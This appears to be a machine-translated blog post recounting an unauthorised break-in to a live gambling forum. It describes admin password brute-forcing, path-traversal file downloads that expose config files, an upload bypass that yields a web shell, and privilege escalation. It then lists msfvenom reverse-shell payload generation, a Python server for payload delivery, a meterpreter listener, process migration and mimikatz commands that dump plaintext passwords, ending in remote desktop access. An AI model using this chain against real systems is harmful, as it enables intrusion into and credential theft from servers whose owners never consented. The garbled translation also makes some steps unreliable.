Title: Remember the penetration test experience of Spinach Forum

Information collection is about to start working, someone Penguin chatted privately and asked me to make a lot of money with him.

It’s okay to send a group message, but everyone started to chat privately. Now the criminals are so rampant that they can be spoiled. Let’s put the JD card first, and open the front desk to be a gambling forum.

A random login, the background came out, the website is from PHP, I tried the common password several times, the admin exists, and the password is incorrect.

Put it on Yunxi and take a look.

It is very stiff to access the domain name.

Let’s take a look at the port again. 3306 is open and the host is from Windows.

After the collection was completed, the framework was not scanned out, and there was almost no progress. The only breakthrough point was the background and port.

Log in to the background 3306 Try it with a try mentality, nothing unexpected happens, mysql doesn't come out.

Top100 backend blasting tried and failed to come out. I don’t have much hope. Looking for JS, there may be passwords, sensitive paths, special interfaces, etc. but it is really clean, maybe I don’t see it carefully.

There was no other breakthrough point, so I could only try it out in the backstage. I took a big dictionary and ran for a long time. Finally, I finally figured out that the iron-headed baby is alive. The dictionary used is the abbreviation, year, and special characters.

Upload the backend forum article management office saw the editor and his eyes lit up in an instant.

Allow single and multiple pictures to try uploading.

Cracked, whitelist restriction.

Various truncations and bypasses failed.

See what editor it is, search for the js file, and find out that it is the wangeditor editor.

I searched online and found that there seemed to be no loopholes in this editor, and my ideas have been done~

The turning point appears and continue to search. If you find the order details, you can also download the order picture.

Download link:

http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20191115/1605370100637841.jpg

The website is obtained through the download link. It is guessed that wwwroot is the root directory of the website. Is there any file download available?

Try constructing a link:

http://www.xxx.com/download.php?filepath=./././wwwroot/news.php

Nice, Hu Hansan is finally about to turn over.

Continue to look for configuration files, generally index.php will introduce database configuration files.

http://www.xxx.com/download.php?filepath=./././wwwroot/index.php

Continue to construct and view config.php.

http://www.xxx.com/download.php?filepath=././wwwroot/config.php

Get the account and try to connect. It prompts that there is no permission or it ends in failure. It is guessed that there is a firewall, or the database host value is set to only access locally.

There is no way, continue to flip and try to read the apache configuration file.

http://www.xxx.com/download.php?filepath=./././apache/conf/httpd.conf

Wang Tefa! HTML files can be executed as php files. Go back to try uploading the file and modify the suffix to upload. Both upload points failed to upload~

Continue to search and find a place to upload avatar in member management.

Modify file name upload, respond and return to the upload path.

Construct the link download, the file download has been successful, and it is proved to exist.

http://www.xxx.com/download.php?filepath=././wwwroot/php/upload/20201115/1805872100098841.html

Splicing access, successfully parsed.

http://www.xxx.com/php/upload/2020xxxx/1805872100098841.html

Excited, trembling hands, successful getshell.

Suha successfully tried to raise rights and checked the patch status. There were many updates, but there were always fish that missed the net.

Use the tool, search directly without patches, exp attacks, the power is upgraded successfully, and the administrator permission is obtained.

continues to rebound shells. After all, it is uncomfortable to use terminals, so use MSF to rebound shells here.

1. First, use msf to generate a Trojan file locally and specify the payload;

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f exe -o achess.exe

Record the penetration test experience of the spinach forum 2. Open the python server locally, with the port 8000;

python -m http.server 8000

Record the penetration test experience of the spinach forum 3. Place the file in the python server and check that it has been enabled;

Download the exe file in the terminal target machine;

echo open server ip:8000exe file.

Record the penetration test experience of the spinach forum 4. Use reverse_tcp in msf to enable monitoring;

handler -p windows/meterpreter_reverse_tcp -H ip -P 4444

5. Execute the exe file and successfully receive the shell.

Don't take it lightly when you get the session. MSF comes with mimikatz module. The mimikatz module in MSF supports both 32-bit and 64-bit systems, but this module loads a 32-bit system by default. Therefore, if the target host is a 64-bit system, directly loading the module will cause many functions to be unusable. Therefore, under a 64-bit system, you must first view the system process list, and then migrate the meterpreter process to a 64-bit program process to load mimikatz and view the system plaintext, which also prevents the session from being interrupted.

Ps check the process and find a stable process for migration.

migrate pid number

Migrate the meterpreter process to 408 process: migrate 408

was successfully migrated, everything was there, but the password was missing. Also, use the mimikatz module in MSF to grab the password.

First load the mimikatz module:

The usage of mimikatz_command module is listed here :

meterpreter mimikatz_command -f a: Enter an incorrect module to list all modules

meterpreter mimikatz_command -f samdump: can list samdump subcommands

meterpreter mimikatz_command -f samdump:hases

meterpreter mimikatz_command -f handle:list List application process

meterpreter mimikatz_command -f service:list List services

meterpreter mimikatz_command -f sekurlsa:searchPasswords

meterpreter run post/windows/gather/smart_hashdump Get hash

Select the samdump module, which has two functions :

? mimikatz_command -f samdump:hases

? mimikatz_command -f samdump:bootkey

But this catches the hash value of the password. I want to see the plaintext password directly, use the searchPasswords function under the sekurlsa module, execute the following command, and successfully crawl the password.

mimikatz_command -f sekurlsa:searchPasswords

The last 3389 connection was successful and the work was completed.

Prove that sometimes it is good to be an iron-headed kid.

Summarize

From Yunxi, fofa, various plug-ins, subdomain names, port information collection, blasting the background to enter this site (it is very important to have a good dictionary), finding the editor upload file failed, whitelist restrictions, finding the editor name, querying the editor vulnerability is fruitless, finding the function point at the download site, the download link exposes the website path, finding the database configuration file through file download, the connection has no permission, finding the apache configuration file, finding the file suffix can be bypassed, and finding other upload points successfully getshell, and after the privilege operation, using the mimikatz module in MSF to grab the login password, the remote desktop connection is successful, and the penetration is over.

Reprinted from the original link: https://cloud.tencent.com/developer/article/1790943